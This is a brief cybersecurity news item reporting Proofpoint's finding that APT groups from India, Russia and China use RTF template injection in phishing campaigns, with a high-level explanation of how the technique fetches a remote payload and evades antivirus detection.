skip to Main Content

Cybercrime, APT’s last weapon is the RTF template injection

Proofpoint: APT’s last weapon is the RTF template injection. Groups from India, Russia and China exploit this technique. The files have low detection rate by public antivirus

RTF template injection has become one of the beast APT weapons. It has been discovered by Proofpoint cybersecurity experts. This technique leverages the legitimate RTF template functionality. It subverts the plain text document formatting properties of an RTF file and allows the retrieval of a URL resource instead of a file resource via an RTF’s template control word capability. This enables a cybercrime actor to replace a legitimate file destination with a URL from which a remote payload may be retrieved. Furthermore, often, the RTF template injection files have a lower detection rate by public antivirus engines when compared to the Office-based template injection technique. Researchers identified distinct phishing campaigns utilizing the technique which have been attributed to a diverse set of APT threat actors in the wild, especially from India, Russia, and China.

Back To Top